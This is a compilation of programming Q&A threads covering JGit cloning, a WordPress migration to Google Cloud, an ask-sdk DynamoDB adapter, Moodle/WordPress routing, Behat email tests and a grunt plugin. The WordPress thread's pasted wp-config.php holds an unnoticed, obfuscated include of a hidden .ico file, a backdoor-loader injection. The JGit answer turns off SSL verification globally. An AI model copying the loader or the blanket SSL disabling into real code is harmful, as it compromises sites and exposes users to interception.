How to set StoredConfig before cloning a remote repo action - jgit

Imagine we have the code snippet below. I want to set this config before cloning a remote repo, but here cloneCommand.getRepository() has no repository yet because nothing has been cloned. How can I set this value before the clone?
CloneCommand cloneCommand = Git.cloneRepository()
        .setURI(remoteRepo)
        .setDirectory(new File(SF_COMPVRP_CODEBASE_LOCAL))
        .setCredentialsProvider(new UsernamePasswordCredentialsProvider(this.gitHubUid, this.gitHubPwd));
StoredConfig config = cloneCommand.getRepository().getConfig();
config.setBoolean("http", null, "sslVerify", false);
config.save();

Open the filesystem (user) config first, manipulate that configuration (I'm not sure whether it persists), and then clone the repository.
// https://stackoverflow.com/questions/33998477/turn-ssl-verification-off-for-jgit-clone-command
/*
* To work around this limitation, you can execute the specific clone steps
* manually as suggested in the comments below:
*
* init a repository using the InitCommand set ssl verify to false
* StoredConfig config = git.getRepository().getConfig();
* config.setBoolean( "http", null, "sslVerify", false );
* config.save();
* fetch (see FetchCommand)
* checkout (see CheckoutCommand)
*/
FileBasedConfig config = SystemReader.getInstance().openUserConfig(null, FS.DETECTED);
config.load();
config.setBoolean("http", null, "sslVerify", false);
config.save();
//Git git = Git.init().setDirectory( localPath ).call();
Git git = Git.cloneRepository().setURI(remoteUrl).setDirectory(localPath).call();
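The steps in that comment can also be spelled out as one complete sequence. A minimal JGit sketch, assuming a reasonably recent JGit version; the URL, local path, and branch name are placeholders, and error handling is omitted:

```java
import java.io.File;

import org.eclipse.jgit.api.Git;
import org.eclipse.jgit.lib.StoredConfig;
import org.eclipse.jgit.transport.URIish;

public class CloneWithoutSslVerify {
    public static void main(String[] args) throws Exception {
        File localPath = new File("/tmp/repo");     // placeholder
        String remoteUrl = "https://host/repo.git"; // placeholder

        // 1. init an empty repository (no network traffic yet)
        try (Git git = Git.init().setDirectory(localPath).call()) {
            // 2. disable SSL verification before the first remote call
            StoredConfig config = git.getRepository().getConfig();
            config.setBoolean("http", null, "sslVerify", false);
            config.save();

            // 3. add the remote and fetch
            git.remoteAdd().setName("origin").setUri(new URIish(remoteUrl)).call();
            git.fetch().setRemote("origin").call();

            // 4. check out the fetched branch (detached HEAD on the remote-tracking ref)
            git.checkout().setName("origin/master").call();
        }
    }
}
```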


Problem setting up GCP wordpress from existing one

So, my company's WordPress site broke some days ago for unknown reasons and I can't access the dashboard anymore, but I managed to get a backup of the files and SQL from the server owner. The owner won't let me access it by SSH to fix it, so we're moving over to a cloud server.
I followed this tutorial extensively. My server is on Google Cloud, a WordPress deploy. To start, I accessed /var/www/html, copied the database info, zipped all the files and git-cloned the original server files from the backup. Server info is here.
I entered the wp-config.php file, changed the db settings to the ones in the Google original config file and saved it.
This is my live config file
<?php
/*688e1*/
#include "\057va\162/w\167w/\150tm\154/s\151te\163_s\145rv\145rs\160/p\145r
f\157rm\141br\141si\154.c\157m.\142r/\167p-\151nc\154ud\145s/\122eq\165es\1
64s/\122es\160on\163e/\056e2\0678a\06653\056ic\157";
/*688e1*/
define('WP_CACHE', true);
define( 'WPCACHEHOME', '/var/www/html/sites_serversp/performabrasil.com.br/wp-content/plugins/wp-super-cache/' );
define('FORCE_SSL_LOGIN', false);
define('FORCE_SSL_ADMIN', false);
define('CONCATENATE_SCRIPTS', false);
if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && strpos($_SERVER['HTTP_X_FORWARDED_PROTO'], 'https') !== false) {
    $_SERVER['HTTPS'] = 'on';
}
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', '****');
/** MySQL database username */
define('DB_USER', '*****');
/** MySQL database password */
define('DB_PASSWORD', '*****');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
define('WP_DEBUG', false);
define('WP_MEMORY_LIMIT', '256M');
/** Enable W3 Total Cache */
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
    define('ABSPATH', dirname(__FILE__) . '/');
define('WP_SITEURL', 'http://34.94.87.104/');
define('WP_HOME', 'http://34.94.87.104/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
I did not configure a domain name; I set it to http://34.94.87.104, which is the Google one. I just changed it in wp_options, in the SQL db.
However, I can't seem to be able to access the files for some reason, does anyone have a clue? Which additional info should I provide? I'm kinda new to sysadmin, just a front end dev.
Since you are changing the domain to a new IP, you can temporarily set these two variables in wp-config.php to your new IP address and see if it works:
You may need to try both the https and http versions (https://34.94.87.104 and http://34.94.87.104) and see which one works, depending on your SSL certificate config.
Source:
https://wordpress.org/support/article/changing-the-site-url/
define( 'WP_HOME', 'http://example.com' );
define( 'WP_SITEURL', 'http://example.com' );

Using Dynamo DB client in my custom ask-sdk webhook

I have built my own custom webhook using ask-sdk and it is deployed on my EC2 instance. Now I want to use DynamoDB through DynamoDbPersistenceAdapter,
but I can't find any reference on how to do that.
DynamoDbPersistenceAdapter will need AWS keys, a table name, and some other details for DynamoDB, but where do I initialize them? I found some code, but it doesn't cover that:
persistenceAdapter = new DynamoDbPersistenceAdapter({
    tableName: 'global_attr_table',
    createTable: true,
    partitionKeyGenerator: keyGenerator
});
This can probably be solved by adding environment variables and by setting up an AWS CLI profile.
Here's how you set up an AWS CLI profile:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html
Once you have a profile set up with your AWS access information, you can export environment variables in your command line or in a shell script:
$> export AWS_PROFILE=YourNewAWSCLIProfileName
$> export AWS_REGION=us-east-1
$> export AWS_DEFAULT_REGION=us-east-1
and you can check that these variables are set by typing
$> echo $AWS_PROFILE
$> echo $AWS_REGION
$> echo $AWS_DEFAULT_REGION
This is what I use. If for some reason that doesn't work, here is some research into how you might add a DynamoDB client.
I was trying to solve a different problem, so let me address yours as I walk through mine:
In: node_modules/ask-sdk/dist/skill/factory/StandardSkillFactory.js
there is reference to something similar to what you have above
new ask_sdk_dynamodb_persistence_adapter_1.DynamoDbPersistenceAdapter({
    tableName: thisTableName,
    createTable: thisAutoCreateTable,
    partitionKeyGenerator: thisPartitionKeyGenerator,
    dynamoDBClient: thisDynamoDbClient,
})
I believe you need to create a DynamoDB client instance, which I found referenced here in the AWS SDK docs:
https://docs.aws.amazon.com/sdk-for-javascript/v2/developer-guide/dynamodb-example-document-client.html
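Putting those pieces together, here is a sketch of how you might wire your own pre-configured client into the adapter. This is an assumption on my part based on the docs above; it presumes the ask-sdk-dynamodb-persistence-adapter and aws-sdk packages are installed, and the table name and region are placeholders:

```javascript
// Sketch only: pass a pre-configured DynamoDB client to the persistence adapter.
// Assumes `npm install ask-sdk aws-sdk`; credentials come from the environment
// (AWS_PROFILE, AWS_ACCESS_KEY_ID, ...) or ~/.aws/credentials -- avoid hard-coding keys.
const AWS = require('aws-sdk');
const { DynamoDbPersistenceAdapter } = require('ask-sdk-dynamodb-persistence-adapter');

const dynamoDBClient = new AWS.DynamoDB({
  apiVersion: 'latest',
  region: process.env.AWS_REGION || 'us-east-1',
});

const persistenceAdapter = new DynamoDbPersistenceAdapter({
  tableName: 'global_attr_table', // placeholder table name
  createTable: true,
  dynamoDBClient: dynamoDBClient, // the client built above
});
```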
You'd have to set your own service:
In: node_modules/aws-sdk/lib/dynamodb/document_client.js
/**
 * Creates a DynamoDB document client with a set of configuration options.
 *
 * @option options params [map] An optional map of parameters to bind to every
 *   request sent by this service object.
 * @option options service [AWS.DynamoDB] An optional pre-configured instance
 *   of the AWS.DynamoDB service object to use for requests. The object may
 *   bound parameters used by the document client.
 * @option options convertEmptyValues [Boolean] set to true if you would like
 *   the document client to convert empty values (0-length strings, binary
 *   buffers, and sets) to be converted to NULL types when persisting to
 *   DynamoDB.
 * @see AWS.DynamoDB.constructor
 *
 */
constructor: function DocumentClient(options) {
    var self = this;
    self.options = options || {};
    self.configure(self.options);
},

/**
 * @api private
 */
configure: function configure(options) {
    var self = this;
    self.service = options.service;
    self.bindServiceObject(options);
    self.attrValue = options.attrValue =
        self.service.api.operations.putItem.input.members.Item.value.shape;
},

/**
 * @api private
 */
bindServiceObject: function bindServiceObject(options) {
    var self = this;
    options = options || {};
    if (!self.service) {
        self.service = new AWS.DynamoDB(options);
    } else {
        var config = AWS.util.copy(self.service.config);
        self.service = new self.service.constructor.__super__(config);
        self.service.config.params =
            AWS.util.merge(self.service.config.params || {}, options.params);
    }
},
I'm not sure what those options might look like.

WordPress directs me to another page on localhost

I installed Moodle 3.4 first, then I installed WordPress. I installed MySQL and PHP and followed the corresponding steps. I logged in to localhost/wordpress to continue configuring WordPress, but it sent me to the Moodle page. The following is Moodle's config.php file:
var/www/html/moodle/config.php
Its content:
<?php // Moodle configuration file
unset($CFG);
global $CFG;
$CFG = new stdClass();
$CFG->dbtype = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost = 'localhost';
$CFG->dbname = 'moodle';
$CFG->dbuser = 'user';
$CFG->dbpass = 'pass';
$CFG->prefix = 'mdl_';
$CFG->dboptions = array (
    'dbpersist' => 0,
    'dbport' => '',
    'dbsocket' => '',
    'dbcollation' => 'utf8mb4_unicode_ci',
);
$CFG->wwwroot = 'http://localhost';
$CFG->dataroot = '/var/www/html/moodledata';
$CFG->admin = 'admin';
$CFG->directorypermissions = 0777;
require_once(__DIR__ . '/lib/setup.php');
// There is no php closing tag in this file,
// it is intentional because it prevents trailing whitespace problems!
The installation of WordPress is in:
var/www/html/wordpress
This is the only thing I have modified in the file wp-config.php. Just changing my data.
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress_asesorias');
/** MySQL database username */
define('DB_USER', 'wordpressuser');
/** MySQL database password */
define('DB_PASSWORD', 'pass');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
URL in browser
Something must be generating conflict but I do not know what it is.
It's because of your $CFG->wwwroot Moodle variable. Change it to 'http://localhost/moodle' if your webserver is pointing to /var/www/html.
Alternatively, modify your hosts file (/etc/hosts on Linux, c:\windows\system32\drivers\etc\hosts on Windows) to set an alternative hostname for localhost, then set the $CFG->wwwroot variable to that value.
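For example, the first option would look like this in config.php (a sketch; adjust the path and hostname to your own setup):

```php
// /var/www/html/moodle/config.php
// Point Moodle at its own subdirectory so plain http://localhost
// is left to WordPress (sketch -- adjust to your setup):
$CFG->wwwroot = 'http://localhost/moodle';
```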

Testing Symfony2 emails with Behat 3

I followed the Behat 2.5 docs to test emails. After a few tweaks to match Behat 3, I ended up with the following code (non-relevant parts removed):
public function getSymfonyProfile()
{
    $driver = $this->mink->getSession()->getDriver();
    if (!$driver instanceof KernelDriver) {
        // Throw exception
    }

    $profile = $driver->getClient()->getProfile();
    if (false === $profile) {
        // Throw exception
    }

    return $profile;
}

/**
 * @Then I should get an email with subject :subject on :email
 */
public function iShouldGetAnEmail($subject, $email)
{
    $profile = $this->getSymfonyProfile();
    $collector = $profile->getCollector('swiftmailer');
    foreach ($collector->getMessages() as $message) {
        // Assert email
    }

    // Throw an error if something went wrong
}
When I run this test, it throws the following error:
exception 'LogicException' with message 'Missing default data in Symfony\Bundle\SwiftmailerBundle\DataCollector\MessageDataCollector' in vendor/symfony/swiftmailer-bundle/Symfony/Bundle/SwiftmailerBundle/DataCollector/MessageDataCollector.php:93
Stack trace:
#0 vendor/symfony/swiftmailer-bundle/Symfony/Bundle/SwiftmailerBundle/DataCollector/MessageDataCollector.php(122): Symfony\Bundle\SwiftmailerBundle\DataCollector\MessageDataCollector->getMailerData('default')
#1 features/bootstrap/FeatureContext.php(107): Symfony\Bundle\SwiftmailerBundle\DataCollector\MessageDataCollector->getMessages()
My profiler is configured as follows:
# app/config/config_test.yml
framework:
    test: ~
    profiler:
        enabled: true
        collect: true
It seems that the Profile is correctly loaded and the MessageDataCollector from Swiftmailer does exist, but it is not doing its work as expected. Any clue to solve this?
Maybe the issue you have has been fixed, as I no longer see it (I'm using Behat v3.0.15, BrowserKit driver 1.3.* and Symfony v2.6.6).
I managed to reproduce your error, but only when I forgot to enable profiler data collecting:
profiler:
    collect: false
Once this problem was solved (the configuration you provided fixed it for me), I managed to check emails in my Behat tests.
Two solutions for this:
Solution #1: Intercepting redirects globally
If it does not break all your other tests you can do so by configuring your web profiler as follows:
web_profiler:
    intercept_redirects: true
Solution #2: Preventing the client from following redirections temporarily
For my part, intercepting redirections globally in the configuration broke most of my other functional tests, so I use this method instead.
Since preventing redirections mainly serves to check data in the data collectors, I decided to use a @collect tag on each scenario requiring redirect interception. I then used @BeforeScenario and @AfterScenario hooks to enable this behaviour only for those scenarios:
/**
 * Follow client redirection once
 *
 * @Then /^(?:|I )follow the redirection$/
 */
public function followRedirect()
{
    $this->getDriver()->getClient()->followRedirect();
}

/**
 * Disable the automatic following of redirections
 *
 * @param BeforeScenarioScope $scope
 *
 * @BeforeScenario @collect
 */
public static function disableFollowRedirects(BeforeScenarioScope $scope)
{
    $context = $scope->getEnvironment()->getContext(get_class());
    $context->getDriver()->getClient()->followRedirects(false);
}

/**
 * Restore the automatic following of redirections
 *
 * @param AfterScenarioScope $scope
 *
 * @AfterScenario @collect
 */
public static function restoreFollowRedirects(AfterScenarioScope $scope)
{
    $context = $scope->getEnvironment()->getContext(get_class());
    $context->getDriver()->getClient()->followRedirects(true);
}
It's not the answer you are looking for, but I'm pretty sure it will suit your needs (and perhaps more).
If I may suggest, try using MailCatcher with this bundle: https://packagist.org/packages/alexandresalome/mailcatcher
You'll be able to easily test whether emails are sent, check their subjects, follow a link in the body, and so on.
Many steps are included with this bundle.

Custom grunt plugin not playing nice with grunt-watch

I'm developing a custom grunt extension that reloads a chrome tab. It works fine when I use it within the plugin's own folder, but then when I try to download it from NPM and use it in another project, it goes bonkers.
I included it as such:
grunt.loadNpmTasks('grunt-chrome-extension-reload');
My custom task code, located in the tasks folder of the plugin, is as such:
/*
* grunt-chrome-extension-reload
* https://github.com/freedomflyer/grunt-chrome-extension-reload
*
* Copyright (c) 2014 Spencer Gardner
* Licensed under the MIT license.
*/
'use strict';

module.exports = function(grunt) {
    var chromeExtensionTabId = 0;

    grunt.initConfig({
        /**
         * Reloads the tab in Chrome whose id is chromeExtensionTabId.
         * Called after the correct tab number is found from the chrome-cli binary.
         */
        exec: {
            reloadChromeTab: {
                cmd: function() {
                    return chromeExtensionTabId
                        ? "chrome-cli reload -t " + chromeExtensionTabId
                        : "chrome-cli open chrome://extensions && chrome-cli reload";
                }
            }
        },

        /**
         * Executes "chrome-cli list tabs", grabs stdout, and finds the IDs of
         * open extension tabs. Sets chromeExtensionTabId to the first one.
         */
        external_daemon: {
            getExtensionTabId: {
                options: {
                    verbose: true,
                    startCheck: function(stdout, stderr) {
                        // Find any open tab in Chrome that has the extensions page loaded and grab its ID
                        var extensionTabMatches = stdout.match(/\[\d{1,5}\] Extensions/);
                        if (extensionTabMatches) {
                            var chromeExtensionTabIdContainer = extensionTabMatches[0].match(/\[\d{1,5}\]/)[0];
                            chromeExtensionTabId = chromeExtensionTabIdContainer.substr(1, chromeExtensionTabIdContainer.length - 2);
                            console.log("Chrome Extension Tab #: " + chromeExtensionTabId);
                        }
                        return true;
                    }
                },
                cmd: "chrome-cli",
                args: ["list", "tabs"]
            }
        }
    });

    grunt.registerTask('chrome_extension_reload', function() {
        grunt.task.run(['external_daemon:getExtensionTabId', 'exec:reloadChromeTab']);
    });
};
So, when I run it in an external project with grunt watch, grunt spits out this error a few hundred times before quitting (endless loop?):
Running "watch" task
Waiting...Verifying property watch exists in config...ERROR
>> Unable to process task.
Warning: Required config property "watch" missing.
Fatal error: Maximum call stack size exceeded
Interestingly, I can't even call my plugin within the watch task, and the problem persists. Only by removing grunt.loadNpmTasks('grunt-chrome-extension-reload'); can I get rid of the issue, which basically means the code inside my task is wrong. Any ideas?
grunt.initConfig() is intended for end users. It completely erases any existing config (including your watch config) and replaces it with the config you're initializing. Thus, when your plugin runs, it replaces the entire config with just the exec and external_daemon task configs.
Try using grunt.config.set() instead: it only sets a given part of the config rather than erasing the entire thing.
But a better pattern for a plugin is to let the user determine the config and just have the plugin handle the task. In other words, avoid setting config on the user's behalf.
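The difference between the two calls can be seen with a tiny stub that mimics just these two grunt APIs (an illustration only, not grunt's real internals):

```javascript
// Minimal stub illustrating why initConfig() inside a plugin clobbers the
// user's config while config.set() merges into it. Stub only -- not grunt.
const grunt = {
  _cfg: { watch: { files: ['src/*.js'], tasks: ['exec'] } }, // user's Gruntfile config
  initConfig(obj) { this._cfg = obj; },                      // replaces everything
  config: { set: (key, val) => { grunt._cfg[key] = val; } }, // sets one key
};

// What the plugin did -- `watch` would be gone afterwards:
// grunt.initConfig({ exec: { /* ... */ } });

// What it should do -- `exec` is added and `watch` survives:
grunt.config.set('exec', { reloadChromeTab: { cmd: 'chrome-cli reload' } });

console.log(Object.keys(grunt._cfg)); // [ 'watch', 'exec' ]
```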
